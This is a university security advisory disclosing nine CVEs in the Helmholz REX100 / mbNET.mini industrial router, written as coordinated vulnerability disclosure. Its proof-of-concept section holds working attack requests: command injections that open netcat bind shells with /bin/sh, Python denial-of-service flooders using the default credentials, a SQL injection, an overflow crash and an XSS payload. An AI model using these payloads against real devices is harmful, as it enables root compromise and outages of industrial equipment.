Text LogoText Logo
back to the list
Date
09/05/2025
Impact
High
CVE IDs
CVE-2025-41673
CVE-2025-41674
CVE-2025-41675
CVE-2025-41676
CVE-2025-41677
CVE-2025-41678
CVE-2025-41679
CVE-2025-41680
CVE-2025-41681

St. Pölten UAS | Multiple Vulnerabilities in Helmholz Industrial Router REX100 / mbNET.mini

Helmholz REX100 devices are prone to multiple command injections and buffer overflow vulnerabilities. These issues can be exploited by attackers to execute arbitrary code on the IIoT device.

Vendor description

„Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.“

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 < 2.3.3
MBConnectline mbNET.mini < 2.3.3

Vulnerability overview

1) Authenticated Command Injection via send_sms (CVE-2025-41674)
A command injection vulnerability has been identified in the send_sms functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

2) Authenticated Command Injection via diag (CVE-2025-41673)
A command injection vulnerability has been identified in the diag functionality of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
A command injection vulnerability has been identified in the communication.sh endpoint of the device. An authenticated attacker can exploit this issue to execute arbitrary commands as root on the device.

4) Authenticated Denial of Service via send_sms (CVE-2025-41677)
An denial of service condition has been identifed in the send_sms functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot.

5) Authenticated Denial of Service via send_mail (CVE-2025-41676)
An denial of service condition has been identifed in the send_mail functionality of the device. An authenticated attacker can exploit this issue to make the device unresponsive until reboot.

6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A sql injection has been identified in the cloud-status.sh endpoint of the device. The issue can be exploited by an authenticated attacker to read out or modify the sqlite database of the device.

7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the “serial” function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device.

8) Unauthenticated Buffer Overflow via confnet/command (CVE-2025-41679)
A buffer overflow issue exists in the confnet service in the “command” function of the device. An unauthenticated attacker can exploit this issue to crash the service or gain remote code execution on the device.

9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)
A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can abuse this issue to execute malicious javascript in the victims browser when using the web service of the device.

Proof of Concept

1) Authenticated Command Injection via send_sms (CVE-2025-41674)
The action send_sms in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to create the file /hello.txt
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.43.18
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 74
Origin: http://10.69.34.3
DNT: 1
Sec-GPC: 1
Authorization: Basic <redacted>
Connection: keep-alive
Referer: http://10.69.34.3/cgi-bin/cloud-status.sh
action=send_sms&numb='test'&text='test$(echo helloThere > /hello.txt)'
2) Authenticated Command Injection via diag (CVE-2025-41673)
The action diag in the file /cgi-bin/cloud-status.sh is vulnerable to a command injection. The following POST request can be used to start a binding shell on port 8080.
POST /cgi-bin/api.sh HTTP/1.1
Host: 10.69.45.3
Content-Length: 71
Authorization: Basic <redacted>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
action=diag&operation=portcheck&parameter=-l -w 9999 -p 8080 -e /bin/sh
3) Authenticated Command Injection via communication.sh (CVE-2025-41675)
The action nc in the file communication.sh is vulnerable to a command injection. The following GET request can be used to start a binding shell on port 1337.
curl 'http://192.168.0.100/cgi-bin/cloudsvr/communication.sh?action=nc&parameter=-l%20-p%201337%20-e%20%2Fbin%2Fsh' \
-H 'Authorization: Basic aGVsbWhvbHo6cm91dGVy' \
--insecure
4) Authenticated Denial of Service via send_sms (CVE-2025-41676)

The action send_sms is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive.

import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh"
LENGTH = 512
ATTACKS = 1000
param = {
    'action': 'send_sms',
    'numb': 'X' * LENGTH,
    'text': 'X' * LENGTH,
}
url = f'http://{HOST}{PATH}'
def send_request(i):
    with requests.Session() as s:
        s.auth = ('helmholz', 'router')
        print(f'[+] - Sending Packet NR {i+1}...')
        s.post(url, data=param)
with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
    executor.map(send_request, range(ATTACKS))
5) Authenticated Denial of Service via send_mail (CVE-2025-41677)
The action send_mail is vulnerable to a denial of service condition. By sending multiple requests, the system becomes unresponsive.
#!/usr/bin/env python3
import requests
from concurrent.futures import ThreadPoolExecutor
HOST = "10.69.43.18"
PATH = "/cgi-bin/api.sh" 
LENGTH = 24
ATTACKS = 5000
param = {
    'action': 'send_email',
    'addr': 'X' * LENGTH,
    'subj': 'X' * LENGTH,
    'text': 'X' * LENGTH
}
url = f'http://{HOST}{PATH}'
def send_request(i: int) -> None:
    try:
        with requests.Session() as session:
            session.auth = ('helmholz', 'router')
            print(f'[+] Sending packet #{i + 1} ...')
            session.post(url, data=param, timeout=10)
    except requests.RequestException as exc:
        print(f'[-] Packet #{i + 1} failed: {exc}')
def main() -> None:
    with ThreadPoolExecutor(max_workers=ATTACKS) as executor:
        executor.map(send_request, range(ATTACKS))
if __name__ == "__main__":
    main()
6) Authenticated SQL Injection via cloud-status.sh (CVE-2025-41678)
A SQL injection has been identified in the cloud-status.sh endpoint of the device. An attacker could leverage this vulnerability to manipulate data inside the SQLite database.
POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 10.69.35.3
Content-Length: 104
Authorization: Basic aGVsbWhvbHo6cm91dGVy
X-Requested-With: XMLHttpRequest
Accept-Language: en-US,en;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Origin: http://10.69.45.3
Referer: http://10.69.45.3/cgi-bin/cloud-status.sh
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
language=test%27%29%3B%20REPLACE%20INTO%20config%20%28name%2Cvalue%29%20VALUES%28%27hacked%27%2C%27yes
A verification shows the manipulated data:
$ echo "SELECT * FROM config WHERE name = 'hacked';" | sqlite3 /etc/db/config
hacked|yes
7) Unauthenticated Buffer Overflow via confnet/serial (CVE-2025-41679)
The overflow is located inside the confnet binary. For exploitation, the serial number of the device is required. For interacting with the service, the script by syss has been used. (www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-063.txt)
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[+] Received response from ('192.168.0.100', 25353):
R50168542
$ python3 cve-2024-45274.py cmd
R501685420000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000
000000000000
$ ./cve-2024-45274.py info 192.168.0.100
[*] Getting device info...
[!] No response received within 3 seconds.
[!] No response received within 3 seconds.
9) Authenticated Persistent XSS via cloud-configure.sh (CVE-2025-41681)

A persistent XSS vulnerability has been identified in the cloud-configure.sh endpoint of the device. An authenticated attacker can exploit this issue to inject arbitrary javascript which gets executed when going to the “help” page. The impact of this vulnerability is very limited.

POST /cgi-bin/cloud-status.sh HTTP/1.1
Host: 192.168.0.100
Content-Length: 250
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Accept: text/html,application/xhtml+xml,application/xml;
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="langchange"
1
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm
Content-Disposition: form-data; name="language"
";alert(1)//"
------WebKitFormBoundaryqWdUJv1Cc3G8GgCm--

Solution

Update to the latest version.

Workaround

Limit network access to the device or remove it if possible.

Recommendation

St. Pölten UAS recommends Helmholz customers to upgrade the firmware to the latest version available. It is advised to perform a security assessment by a professional company.

Technology Used

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.re).

Found by

F. Bruckmoser, M. Eder, J. Heigl, M. Heudorn, G. Hofmarcher, M. Kadlec, M. Pristauz-Telsnigg, S. Resch, P. Schweinzer, M. Gschiel

Contact Timeline

  • 2025-06-11: Contacting Helmholz via psirt@helmholz.de.
  • 2025-06-16: Contacting them again as their PGP setup was broken.
  • Sending them the advisory via secure channel
  • 2025-06-17: Response from manufacturer mbconnectline. Vulnerabilities are
    reproducible and are present in latest firmware.
  • 2025-07-21: Coordinated release with PSIRT@VDE and Helmholz.

Author(s)

FH St. Pölten Logo

UAS St. Pölten

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.